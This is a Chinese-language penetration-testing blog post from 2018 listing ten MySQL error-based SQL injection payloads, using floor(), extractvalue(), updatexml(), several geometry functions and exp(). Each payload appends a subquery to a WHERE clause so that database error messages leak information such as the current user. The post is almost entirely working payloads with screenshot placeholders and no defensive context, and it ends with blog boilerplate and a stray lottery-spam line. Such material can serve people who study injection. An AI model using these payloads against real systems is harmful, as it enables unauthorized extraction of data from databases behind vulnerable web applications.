?

Nov 23 2018

十種MySQL報錯注入

首頁 » 滲透測試 » 十種MySQL報錯注入   

十種MySQL報錯注入

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

1.png

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

2.png

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

3.png

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
4.png


5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));


5.png
6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
6.png


7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

7.png

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

8.png

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

9.png

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

10.png

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: 報錯注入

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «上傳繞過WAF的tips大全 | BurpSuite_v2.0下載»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖